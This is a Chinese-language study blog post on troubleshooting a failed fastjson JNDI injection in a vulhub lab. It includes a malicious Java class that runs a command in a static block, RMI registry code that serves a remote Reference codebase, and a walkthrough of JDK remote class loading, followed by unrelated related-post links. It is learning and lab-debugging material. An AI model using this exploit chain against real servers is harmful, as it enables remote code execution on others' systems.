Java安全学习笔记--一次对JNDI注入失败的问题排查(手写POC以及rmi)
目录
前言
恶意类代码:
RMI注册中心以及服务端代码:
问题一:
问题二
调试
问题三
总结
前言
之前分析了fastjson的jdbcRowSetImpl利用链之后当时也是手写了所用的代码并测试,这里面包括rmi注册中心及服务端还有POC代码,在本地测试成功后我在虚拟机中用vulhub启动了一个fastjson漏洞环境进行测试,但是出了问题,记录一下排查问题的过程。
恶意类代码:
public class rmiEvilClass {static {try {Runtime.getRuntime().exec(new String[]{"touch","/txt"});//在根目录创建一个txt文件夹}catch (Exception e){e.printStackTrace();}}}RMI注册中心以及服务端代码:
import com.sun.jndi.rmi.registry.ReferenceWrapper;import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;public class rmiServer {public static void main(String[] args)throws Exception {String evilClassurl="http://192.168.1.254:8081";Registry registry= LocateRegistry.createRegistry(1099);Reference reference=new Reference("rmiEvilClass","rmiEvilClaaa",evilClassurl);ReferenceWrapper referenceWrapper=new ReferenceWrapper(reference);registry.bind("hell",referenceWrapper);}
}
乍一看没什么问题。。。
问题一:
首先是命令没有执行,当时猜测了很多原因网络不通,端口占用,防火墙,但是一一检测都没有问题,后来没办法只好抓包了,打开抓包有很多arp在找192.168.1.1的地址,这个就不管了 not arp过滤掉,然后开始我们的请求,这里没有截图,在wireshark上只看到了我们向fastjson服务所在端口的发送payload的http报文,以及tcp建立和断开连接的报文,并没有rmi报文。
我的rmi服务端都没什么问题为啥没报文,这里在网上也找了一会,但是相关内容不多,很多复现都是直接利用工具创建的rmi服务。
后来我在反过头看JNDI原理解析的时候,突然想起来,我为了方便把恶意的.class文件和.java文件都放在了运行RMI服务端代码的包下面了,http服务也是在这个文件下面启动的,那这样这个文件不就在CLASSPATH里面了吗,就不会远程调用类了。
在本地测试之后果然是这个问题,我只要修改.java文件就能改变执行的命令,通过python启动的http服务也没有请求记录,我把两个文件放到了其他文件中去时我就可以看到请求记录了。
本地测试截图:
但是第二个问题来了:没有请求路径,这说明没有去加载远程恶意类
问题二
没有请求恶意类,又去检查了代码还是感觉没啥问题,为啥不请求恶意类呢?在这里卡了半天在想原因,最后没办法只好调试一遍代码了,之前学jndi注入时也分析过原理了但是没记录下来,这里就当做复习吧。
调试
initialContext.lookup()
public Object lookup(String name) throws NamingException {return getURLOrDefaultInitCtx(name).lookup(name);}getURLOrdefaultInitCtx()
获取用来解析字符串名称 name 的上下文。如果 name 名称是一个 url 字符串,则试着定位一个用于该字符串的 url 上下文。如果没有找到这样的上下文,或者 name 不是一个 url 字符串,则返回 getdefaultinitctx()。
getURLOrdefaultInitCtx().lookup()
public Object lookup(String var1) throws NamingException {ResolveResult var2 = this.getRootURLContext(var1, this.myEnv);//var1:rmi://127.0.0.1/evilContext var3 = (Context)var2.getResolvedObj();Object var4;try {var4 = var3.lookup(var2.getRemainingName());} finally {var3.close();}return var4;}这里会通过this.getRootURLContext(var1,this,myEnv)获取到rmi注册中心和远程调用的name
然后var3.lookup()就是通过获取到的注册中心来获取远程调用对象
RegistryContext.lookup()
public Object lookup(Name var1) throws NamingException {if (var1.isEmpty()) {return new RegistryContext(this);} else {Remote var2;try {var2 = this.registry.lookup(var1.get(0));//这时通过注册中心的lookup就可以获取到我们绑定在注册中心的类了} catch (NotBoundException var4) {throw new NameNotFoundException(var1.get(0));} catch (RemoteException var5) {throw (NamingException)wrapRemoteException(var5).fillInStackTrace();}return this.decodeObject(var2, var1.getPrefix(1));}}接着调用RegistryContext.decodeObject去解析这个类
private Object decodeObject(Remote var1, Name var2) throws NamingException {try {Object var3 = var1 instanceof RemoteReference ? ((RemoteReference)var1).getReference() : var1;return NamingManager.getObjectInstance(var3, var2, this, this.environment);
//远程类实现了RemoteReference接口直接return} catch (NamingException var5) {throw var5;} catch (RemoteException var6) {throw (NamingException)wrapRemoteException(var6).fillInStackTrace();} catch (Exception var7) {NamingException var4 = new NamingException();var4.setRootCause(var7);throw var4;}}NamingManager.getObjectInstance()部分代码
if (ref != null) {String f = ref.getFactoryClassName();if (f != null) {// if reference identifies a factory, use exclusivelyfactory = getObjectFactoryFromReference(ref, f);if (factory != null) {return factory.getObjectInstance(ref, name, nameCtx,environment);}这里获取了reference实例中的的工厂类名,就是rmiEvilClass,之后获取工厂类,这里还没有请求恶意类。
NamingManager.getObjectFactoryFromReference()
static ObjectFactory getObjectFactoryFromReference(Reference ref, String factoryName)throws IllegalAccessException,InstantiationException,MalformedURLException {Class clas = null;// Try to use current class loadertry {clas = helper.loadClass(factoryName);} catch (ClassNotFoundException e) {// ignore and continue// e.printStackTrace();}// All other exceptions are passed up.// Not in class path; try to use codebaseString codebase;if (clas == null &&(codebase = ref.getFactoryClassLocation()) != null) {try {clas = helper.loadClass(factoryName, codebase);} catch (ClassNotFoundException e) {}}return (clas != null) ? (ObjectFactory) clas.newInstance() : null;}首先会在本地的CLASSPATH中找之后再 到去远程的地址中去找这里helper是VersionHelper12类
这里lookup是两个重载方法一个在本地查找一个查找远程
public Class loadClass(String className) throws ClassNotFoundException {return loadClass(className, getContextClassLoader());}
//本地
public Class loadClass(String className, String codebase)throws ClassNotFoundException, MalformedURLException {ClassLoader parent = getContextClassLoader();ClassLoader cl =URLClassLoader.newInstance(getUrlArray(codebase), parent);return loadClass(className, cl);}
//远程Class loadClass(String className, ClassLoader cl)throws ClassNotFoundException {Class<?> cls = Class.forName(className, true, cl);return cls;}
//最终都会调用这个类传入ClassLoader,远程
最后远程加载类
到目前位置都没有什么问题,也使用FactoryURLClassLoader去加载远程工厂类了但是为什么还是没有路径呢?
想了一会,我想cl作为加载类应该会存着远程加载路径,我决定去看一下FactoryURLClassLoader内的数据,这里又去百度看了一下这个FactoryURLClassLoader类里属性及方法的介绍,知道了ucp属性存贮着类和资源的搜索路径。
可以看到这里的路径,我觉得也没什么对啊,反复了调试几次又陷入了沉思。
后来也是灵光一闪,一般调试这些类我都会猜测一些功能是怎么实现的,我在想这个路径应该会拼接上rmiEvilClass.class然后发起请求,这里是不是缺一个”/“?是不是我之前写rmi服务端的代码没有写反斜杠?
一翻看代码果然没有,再去看网上的POC果然别人都有反斜杠,先试一试吧,修改了rmi服务端的代码重启rmi服务端,然后本地测试。
String evilClassurl="http://192.168.1.254:8081";成功了!!!!!!!!!!!!!!
虽然这只是因为一个反斜杠没写导致的问题,但当找出问题的根源时感觉真的爽。
问题三
但是测试过程中本地的测试代码报错了。
这个简单就是编译和运行的Java版本不一致,我编译用的本机java8,IEDA的是java7
重新编译并测试:
总结
这次一晚上加一上午的问题排查最终的结果是因为一个反斜杠,收获还是有不少的
Java安全学习笔记--一次对JNDI注入失败的问题排查(手写POC以及rmi)相关推荐
- Effective_STL 学习笔记(四十三) 尽量用算法调用代替手写循环
每一个算法接受至少一对用来指示将被操作对象区间的迭代器,比如,min_element 可以找出此区间中的最小的值,而 accumulate 则对区间内的元素作某种形式的整体求和运算,partition ...
- Java分布式应用学习笔记08JMX规范与常用的监控场景
转自:Java分布式应用学习笔记08JMX规范与常用的监控场景 1. JMX规范 JMX是"Java管理扩展的"的缩写,它和其他JavaEE类似也是曾经的Sun提出的一种规范(规 ...
- Java NIO 学习笔记(三)----Selector
目录: Java NIO 学习笔记(一)----概述,Channel/Buffer Java NIO 学习笔记(二)----聚集和分散,通道到通道 Java NIO 学习笔记(三)----Select ...
- 可能是最全面的 Java G1学习笔记
转载自 可能是最全面的 Java G1学习笔记 引子 最近遇到很多朋友过来咨询G1调优的问题,我自己去年有专门学过一次G1,但是当时只是看了个皮毛,因此自己也有不少问题.总体来讲,对于G1我有几个疑惑 ...
- 深入浅出 Java CMS 学习笔记
转载自 深入浅出 Java CMS 学习笔记 引子 带着问题去学习一个东西,才会有目标感,我先把一直以来自己对CMS的一些疑惑罗列了下,希望这篇学习笔记能解决掉这些疑惑,希望也能对你有所帮助. 1. ...
- Java NIO学习笔记之图解ByteBuffer
转载自 Java NIO学习笔记之图解ByteBuffer ByteBuffer前前后后看过好几次了,实际使用也用了一些,总觉得条理不够清晰. <程序员的思维修炼>一本书讲过,主动学习,要 ...
- 转载:mongoDB java驱动学习笔记
http://www.blogjava.net/watchzerg/archive/2012/09/22/388346.html mongoDB java驱动学习笔记 指定新mongo实例: Mong ...
- 2019年Java Web学习笔记目录
Java Web学习笔记目录 1.Java Web学习笔记01:动态网站初体验 2.Java Web学习笔记02:在Intellij里创建Web项目 3.Java Web学习笔记03:JSP元素 4. ...
- 【Java基础学习笔记】- Day11 - 第四章 引用类型用法总结
Java基础学习笔记 - Day11 - 第四章 引用类型用法总结 Java基础学习笔记 - Day11 - 第四章 引用类型用法总结 4.1 class作为成员变量 4.2 interface作为成 ...
最新文章
- 音乐网站购买服务器,怎么样去做一个音乐网站
- 解决AW2013用led_classdev_register()注册red但/sys/class/leds下看不到red的问题
- Scrapy框架的学习(1.scrapy的概念以及scrapy的工作流程)
- Redis :01---Redis简介和安装
- 高文院士:从“乡村教师”到人工智能掌舵者的40年科研路
- 苹果将于 2025 年推出的 Apple Car 长什么样?
- Java工作笔记-apache-tomcat-8.5.49及geoserver-2.7.5搭建
- 2010.11.13信息系统项目管理师考试下午试题答题思路剖析
- Linux驱动(3)--单片机驱动与Linux驱动的区别
- 金山毒霸专业版高调上线 宣称杀毒速度增3倍
- svg操纵方案 基于 D3 还是 angular?
- 《『若水新闻』客户端开发教程》——06.设计新闻内容UI
- linun开启oracle监听,Linux下配置Oracle监听器
- 2022年计算机二级考试 Web程序设计模拟题及答案
- 微信小程序UI设计规范及文档模版
- Redhat7安装HDS存储多路径软件
- Scaling Up Your Kernels to 31x31: Revisiting Large Kernel Design in CNNs
- 2022年跨境电商卖家如何在Facebook上做广告【完整指南】
- 爱剪辑 v3.0.0 视频剪辑工具 去除推广弹窗
- gitlab合并分支